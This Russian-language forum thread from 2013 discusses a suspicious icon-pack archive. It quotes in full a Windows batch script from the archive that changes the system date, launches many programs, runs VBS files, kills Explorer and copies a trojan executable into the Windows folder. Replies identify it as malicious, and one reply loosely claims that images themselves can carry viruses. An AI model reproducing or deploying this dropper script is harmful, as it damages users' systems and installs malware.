Помогите!!! - Безопасность, Шифрование

ksmgames · 20.10.2013, 22:13

Недавно захотел скачать значки с сайта element, украсить новую тему, нашел подходящие значки, скачал, проверил на вирусы, мало-ли в архиве что лежит. Антивирус Каперского вылез с вирусом trojan32, я побоялся. Но значки мне очень нужны, а то на обычную слоупочную тему для windows смотреть надоело. Зашел через виртуальную машину, закинул архив и открыл, вроде ничего. Начал устанавливать значки. Все идет, но компьютер все равно орет что там вирус помогите, я вообще не догоняю, разве может-ли вирус быть в значках?! По моему это легенда. А может быть сам архив вирусный, не знаю.

Там еще комментарий у архива был, вот, если надо:

Код:

@echo off
date 21.12.2012
time 00.00
md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
start 1
start 2
start 3
start 4
start 5
start 6
start 7
start 8
start help
start DIR
start explorer
start mspaint
start notepad
start winword
start soffice
start wordpad
start calc
start taskmgr
start magnify
start mobsync
start wisptis
start snippingtool
start osk
start narrator

cls

start coiffeuse.vbs
start babaLily.vbs

taskkill /f /im explorer.exe
taskkill /f /im sidebar.exe

del: coiffeuse.vbs
del: babaLily.vbs
copy trj32.exe C:\WINDOWS\

exit

Вадим Мошев · 21.10.2013, 09:42

То, что написано красным - команды для CMD. В общем, выполняет он нехорошие действия - копирует вирус, запускает кучу программ и завершает нужные процессы (например, Explorer.exe)

главное всё это происходит тихо и в "конец света"

Код:

@echo off
date 21.12.2012
time 00.00

Что касается вируса в значках... Значки - это изображения (в данном случае файлы *.ico). Я думаю, что изображения могут быть заразны. Вспоминается пример, когда одного из ваших контактов ICQ взламывают, вам от его имени приходят сообщения а-ля "Зачем ты выложим эту фотку в сеть? http://****.jpg". Вы нажимаете ссылку и вирус у вас активируется.

Utkin · 21.10.2013, 10:52

Цитата:

taskkill /f /im explorer.exe
taskkill /f /im sidebar.exe

Убивает эксплорер и строку с Пуском? Конечно вирус.
Дались Вам эти значки? Что во всем инете не ползначка кроме как там нету что-ли? Сказано вам - вирус, значит надо плюнуть и растереть. Ищите альтернативные варианты и радуетесь жизни.

ЗЫ.

Цитата:

copy trj32.exe C:\WINDOWS\

Вот оно чудо из чудес.

ksmgames · 22.10.2013, 09:14

Все, удалю архив, другие скачаю, просто я люблю компьютер украшать) Грех не украсить когда свободная оперативка простаивает)

ksmgames · 22.10.2013, 09:16

Я в bat и cmd не особо шарю, знаю только как копировать, теперь увидел что он копируют троян в WINDOWS и файлы удаляет. Спасибо за ответы.

20.10.2013, 22:13	#1
ksmgames Регистрация: 20.10.2013 Сообщений: 8	Помогите!!! Недавно захотел скачать значки с сайта element, украсить новую тему, нашел подходящие значки, скачал, проверил на вирусы, мало-ли в архиве что лежит. Антивирус Каперского вылез с вирусом trojan32, я побоялся. Но значки мне очень нужны, а то на обычную слоупочную тему для windows смотреть надоело. Зашел через виртуальную машину, закинул архив и открыл, вроде ничего. Начал устанавливать значки. Все идет, но компьютер все равно орет что там вирус помогите, я вообще не догоняю, разве может-ли вирус быть в значках?! По моему это легенда. А может быть сам архив вирусный, не знаю. Там еще комментарий у архива был, вот, если надо: Код: @echo off date 21.12.2012 time 00.00 md 1 md 2 md 3 md 4 md 5 md 6 md 7 md 8 start 1 start 2 start 3 start 4 start 5 start 6 start 7 start 8 start help start DIR start explorer start mspaint start notepad start winword start soffice start wordpad start calc start taskmgr start magnify start mobsync start wisptis start snippingtool start osk start narrator cls start coiffeuse.vbs start babaLily.vbs taskkill /f /im explorer.exe taskkill /f /im sidebar.exe del: coiffeuse.vbs del: babaLily.vbs copy trj32.exe C:\WINDOWS\ exit Говорят без высшего никуда, Билл Гейтс тому пример, ушел с первого курса. Последний раз редактировалось Stilet; 21.10.2013 в 12:06. Причина: Добавил комментарий.

21.10.2013, 09:42	#2
Вадим Мошев Старожил Регистрация: 12.11.2010 Сообщений: 8,568	То, что написано красным - команды для CMD. В общем, выполняет он нехорошие действия - копирует вирус, запускает кучу программ и завершает нужные процессы (например, Explorer.exe) главное всё это происходит тихо и в "конец света" Код: `@echo off date 21.12.2012 time 00.00` Что касается вируса в значках... Значки - это изображения (в данном случае файлы .ico). Я думаю, что изображения могут быть заразны. Вспоминается пример, когда одного из ваших контактов ICQ взламывают, вам от его имени приходят сообщения а-ля "Зачем ты выложим эту фотку в сеть? http://**.jpg". Вы нажимаете ссылку и вирус у вас активируется. Последний раз редактировалось Вадим Мошев; 21.10.2013 в 09:58.*

22.10.2013, 09:14	#4
ksmgames Регистрация: 20.10.2013 Сообщений: 8	Все, удалю архив, другие скачаю, просто я люблю компьютер украшать) Грех не украсить когда свободная оперативка простаивает) Говорят без высшего никуда, Билл Гейтс тому пример, ушел с первого курса.

22.10.2013, 09:16	#5
ksmgames Регистрация: 20.10.2013 Сообщений: 8	Я в bat и cmd не особо шарю, знаю только как копировать, теперь увидел что он копируют троян в WINDOWS и файлы удаляет. Спасибо за ответы. Говорят без высшего никуда, Билл Гейтс тому пример, ушел с первого курса.

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Помогите создать програму для роботы с файлами, пожалуйста помогите нужно очень срочно	Сергей Человек	Фриланс	3	06.07.2009 19:30
Помогите Помогите Пожалуйста Решить Одну Задачку в Паскале!!!	VisTBacK	Помощь студентам	6	19.09.2008 13:44